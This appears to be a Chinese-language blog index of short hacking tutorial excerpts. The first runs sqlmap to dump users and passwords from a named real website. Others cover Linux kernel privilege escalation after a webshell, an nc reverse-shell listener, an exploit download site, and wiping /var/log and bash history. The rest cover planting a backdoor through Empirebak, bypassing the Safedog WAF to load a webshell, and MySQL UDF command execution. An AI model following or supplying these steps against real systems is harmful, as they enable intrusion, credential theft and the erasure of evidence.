摘要:测试目标:http://www.cmccb.org.cn/cmccbnew/SiteInfo/SiteInfo_Onesel.php?Bar_ID=26=====================================获取当前用户、当前库、数据库版本、所有用户、所有库、用户密码:sqlmap...
阅读全文
摘要:拿到linux服务器的webshell后,先看有没有执行命令的权限uname -a查看linux的内核版本gcc --help试探服务器是否可以进行gcc编译(有些exp没有编译)访问/tmp目录,看是否有所有权限如果没有,则通过 chmod -R 777 开启上传对应内核版本的exp到/tmp目录,然后执行./exp名没编译的则运行gcc -o /tmp/文件名 /tmp/文件名.cnc反弹nc -l -n -v -p 12666附个常用exp收集地址:http://exp.0x80c.com/痕迹清理:rm -f -r /var/log/*rm .bash_historyrm recent
阅读全文
摘要:一、进入帝国备份王(Empirebak)后先备份数据,然后下载备份数据包,查看里面的任一文件并复制源代码。二、点击左侧"替换目录文件",替换目录选择刚才下载的数据库备份目录,将上面复制的代码粘贴进去,"替换为"一栏写填写hello world!三、访问http://网站域名/帝国安装目录/bdata/数据库备份目录/config.php,若能看到hello world!刚说明一句话替换成功,连接密码为:nst
阅读全文
摘要:如果目标网站是 ASP 网站,我们可以将大马写到一个txt文件里面,命名为dama.txt,再建一个文本文档,asp的就写入: 保存为x.asp,两个文件传同目录下,访问http://网站域名 /x.asp ,就是我们的大马了。如果目标网站是PHP网站,那么同样的原理,先把大马的代码,写到 dama.txt中,新建一个 php文件,php的内容中写入:,然后两个一起上传到空间里面, 这样就可以绕过安全狗了。
阅读全文
摘要:一、适用条件 1.目标系统是Windows(Win2000,XP,Win2003); 2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。 3.有root账号密码 二、导出udf MYSQL 5.1以下版本导出路径: C:\Winnt\udf.dll 2000 C:\Windows\udf.dll 2003(有的系统\被转义,需要改为C:\Windows\\udf.dll) 导出DLL文件,导出时请勿必注意导出路径(一般情况下对任何目录可写,无需考虑权限问题) MYSQL 5.1以上版本,必须...
阅读全文
摘要:select version();查看mysql版本select @@basedir查看mysql安装目录
阅读全文